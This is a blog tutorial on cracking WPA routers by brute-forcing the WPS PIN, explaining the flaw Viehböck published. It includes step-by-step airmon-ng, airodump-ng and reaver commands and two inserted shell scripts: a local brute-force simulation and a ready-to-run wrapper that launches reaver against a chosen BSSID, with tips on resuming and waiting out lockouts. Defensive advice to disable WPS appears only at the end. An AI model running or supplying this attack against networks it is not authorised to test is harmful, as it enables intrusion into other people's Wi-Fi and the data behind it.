Cracking Almost Any Router

Tuesday, January 17, 2012

We should all know by now that WEP is completely broken. WPA is more secure (which is true), and with a strong passphrase the protocol itself should be hard to break. But when you bolt simplicity onto a secure design, and the bolt-on is badly designed, you break the secure side.

WPA cracking can take a long time, even with GPUs on your side: a day or more, and probably closer to a month unless your machine is built for cracking. Recently there has been news about a paper by Stefan Viehböck that goes through the design of WPS. Yes, WPS, not WPA. WPS is a convenience feature built into routers to make it easier for devices to connect to them, and its design is the flaw. He describes a way of cracking into a router in 4 to 10 hours, depending on the router.

So what is WPS? WPS is a protocol built into the router so that someone who knows nothing about computers can read the 8-digit numeric PIN printed on the bottom of the router, type it in, and have the router respond with the (complex) WPA key and connect them. In principle that is an OK design. The problem is that the 8-digit PIN is not really 8 digits: the last digit is a checksum of the first seven, and the router tells the client whether the first four digits were right before it ever checks the remaining three. That cuts the search from 10^8 PINs to at most 10^4 + 10^3 = 11,000 guesses.
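To make that arithmetic concrete, here is an added example (not from the original post) that implements the WPS checksum rule and the two-phase guessing Viehböck describes, run against a local stand-in for the router. Nothing here touches a radio; the "AP" is two shell functions, and the secret PIN 12345670 used at the end is a constructed test value.

```shell
#!/bin/sh
# Added example (not from the original post).  Models the WPS PIN checksum and
# the two-phase brute force described in Viehböck's paper against a local
# stand-in for the router, so the 11,000-guess bound is something you can run
# rather than take on faith.  No radio is involved; the secret PIN used at the
# bottom is a constructed test value.

# The last digit of a WPS PIN is a checksum over the first seven: weights
# 3,1,3,1,3,1,3 starting from the least significant digit, then
# (10 - sum mod 10) mod 10.  Takes the 7 data digits as a string.
wps_checksum() {
    local n acc w i
    n=${1#"${1%%[!0]*}"}        # strip leading zeros ("0012345" -> "12345") ...
    n=$(( ${n:-0} ))            # ... so the shell does not parse them as octal
    acc=0; w=3; i=0
    while [ "$i" -lt 7 ]; do
        acc=$(( acc + w * (n % 10) ))
        n=$(( n / 10 ))
        w=$(( 4 - w ))          # alternate 3,1,3,1,...
        i=$(( i + 1 ))
    done
    echo $(( (10 - acc % 10) % 10 ))
}

# True if an 8-digit PIN's last digit matches the checksum of the first seven.
wps_pin_valid() {
    [ "${#1}" -eq 8 ] && [ "${1#???????}" = "$(wps_checksum "${1%?}")" ]
}

# Stand-in for the router.  A real AP sends a NACK after message M4 if the
# first four digits are wrong and only after M6 if the last four are, which
# is exactly the leak that lets an attacker confirm each half on its own.
# $1 = secret PIN (integer), $2 = guessed first half (integer).
ap_first_half_ok() { [ $(( $1 / 10000 )) -eq "$2" ]; }
# $1 = secret PIN (integer), $2 = guessed full PIN (integer).
ap_full_pin_ok()   { [ "$1" -eq "$2" ]; }

# Two-phase brute force.  Phase 1 walks 0000..9999 for the first half, phase 2
# walks 000..999 for the next three digits and derives the checksum, so the
# worst case is 10,000 + 1,000 = 11,000 guesses.  Prints "<pin> <attempts>".
wps_bruteforce() {
    local secret first second pin7 pin attempts
    secret=${1#"${1%%[!0]*}"}; secret=$(( ${secret:-0} ))
    attempts=0; first=0
    while [ "$first" -lt 10000 ]; do
        attempts=$(( attempts + 1 ))
        ap_first_half_ok "$secret" "$first" && break
        first=$(( first + 1 ))
    done
    second=0
    while [ "$second" -lt 1000 ]; do
        attempts=$(( attempts + 1 ))
        pin7=$(( first * 1000 + second ))
        pin=$(( pin7 * 10 + $(wps_checksum "$pin7") ))
        if ap_full_pin_ok "$secret" "$pin"; then
            printf '%08d %d\n' "$pin" "$attempts"
            return 0
        fi
        second=$(( second + 1 ))
    done
    return 1
}

# Constructed demo: the well-known test PIN 12345670 falls in 1,803 guesses.
wps_bruteforce 12345670
```

The point of the two oracle functions is the split: because the router confirms the first half before the second is ever examined, the two halves are attacked independently, and the checksum removes one more digit from the second phase. Against a real router each guess is a full WPS exchange, which is why the attack is measured in hours rather than seconds.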

But I am getting sidetracked. What you really want to know is how to test this, right? ;-)

What you will need:

aircrack-ng installed
a Wi-Fi card that can be put into monitor mode
Reaver

So let's get to the steps.

1. Find your wireless card's interface name. Mine is wlan0.

2. Put the card into monitor mode:
sudo airmon-ng start wlan0

3. Find the router to attack:
sudo airodump-ng mon0

4. Attack the selected router. The -b argument is its BSSID (the MAC address shown by airodump-ng), not the SSID:
sudo reaver -i mon0 -b 00:01:02:03:04:05

5. Wait until it finishes.
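The steps above as one script, added here as an example and not the post's own code. It covers steps 2, 4 and 5 with the checks worth running before committing hours to a brute force; step 3 stays manual because airodump-ng is interactive. It assumes aircrack-ng and reaver 1.4 are installed and that the network is yours or you have written permission to test it. The interface names are assumptions (airmon-ng created mon0 in 2012; newer releases name the monitor interface wlan0mon), and the reaver flags used are -vv (print each PIN tried), -l (seconds to wait when the router locks WPS) and -c (stay on one channel).

```shell
#!/bin/sh
# Added example, not the post's own code: steps 2, 4 and 5 as one script with
# the sanity checks worth doing before committing hours to a brute force.
# Assumes aircrack-ng and reaver 1.4 are installed and that the network is
# yours or you have written permission to test it.  Interface names are
# assumptions (mon0 is what airmon-ng created in 2012; newer releases use
# wlan0mon).

# A BSSID is the router's MAC address: six hex pairs separated by colons.
valid_bssid() {
    hex2='[0-9A-Fa-f][0-9A-Fa-f]'
    case "$1" in
        $hex2:$hex2:$hex2:$hex2:$hex2:$hex2) return 0 ;;
        *) return 1 ;;
    esac
}

# Compose the reaver command line.  $1 monitor interface, $2 BSSID,
# $3 optional channel, $4 lock delay in seconds (reaver's default is 60;
# routers that lock WPS for 5 minutes or more want something larger).
reaver_cmd() {
    cmd="reaver -i $1 -b $2 -vv -l ${4:-60}"
    if [ -n "${3:-}" ]; then
        cmd="$cmd -c $3"
    fi
    echo "$cmd"
}

# run_attack <wifi interface> <monitor interface> <bssid> [channel]
run_attack() {
    iface=$1; mon=$2; bssid=$3; channel=${4:-}
    [ "$(id -u)" -eq 0 ] || { echo "run as root (the post uses sudo)" >&2; return 1; }
    for tool in airmon-ng reaver; do
        command -v "$tool" >/dev/null 2>&1 || { echo "$tool not installed" >&2; return 1; }
    done
    valid_bssid "$bssid" || { echo "not a BSSID: $bssid" >&2; return 1; }
    case "$iface$mon" in
        *[!A-Za-z0-9]*) echo "odd characters in interface name" >&2; return 1 ;;
    esac
    case "$channel" in
        *[!0-9]*) echo "channel must be a number" >&2; return 1 ;;
    esac
    airmon-ng start "$iface" >/dev/null                  # step 2
    # Step 3 stays manual: pick the BSSID from airodump-ng, and run
    # "wash -i $mon" (ships with reaver) to confirm the target advertises
    # WPS and is not already locked; otherwise reaver will sit there forever.
    cmd=$(reaver_cmd "$mon" "$bssid" "$channel")
    echo "+ $cmd"
    $cmd                                                 # steps 4 and 5
    # Ctrl+C is safe: reaver saves its progress per BSSID and offers to
    # resume next time.  Put the card back into managed mode when done.
    airmon-ng stop "$mon" >/dev/null
}

# Usage: sh wps-test.sh --run wlan0 mon0 00:01:02:03:04:05 6
if [ "${1:-}" = "--run" ]; then
    shift
    run_attack "$@"
fi
```

Run it as root with the physical interface, the monitor interface airmon-ng created, the BSSID and optionally the channel. The BSSID check matters more than it looks: a typo there does not fail loudly, reaver simply never gets an answer and you lose the evening.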

One neat thing: if you need to stop reaver mid-crack because you have to leave, you can hit Ctrl+C, and the next time you start it against the same router it will ask whether you want to continue where you left off. This is extremely helpful because some routers lock WPS for a period of time after too many failed attempts, be it 5 minutes or longer; reaver notices the lock and waits it out rather than giving up, so a crack can span several sessions.

The important takeaway is that we all need to do something more to protect our wireless routers now: log in to your router's admin page and turn WPS off so this attack cannot be used against it in the future. Then check that the setting really took. Some firmware keeps answering WPS requests even after it has been disabled in the web interface, so rescan with wash (it ships with reaver) and confirm your BSSID no longer shows up as WPS-enabled. A router that rate-limits or locks WPS after failed attempts slows the attack down but does not stop it.
For my router, which is a cheap Dynex router, it is listed under Wi-Fi Protected Setup. This is where you disable the service.

I hope we all learned something here, and I hope you have fun testing this out on your router.
Pictures of the process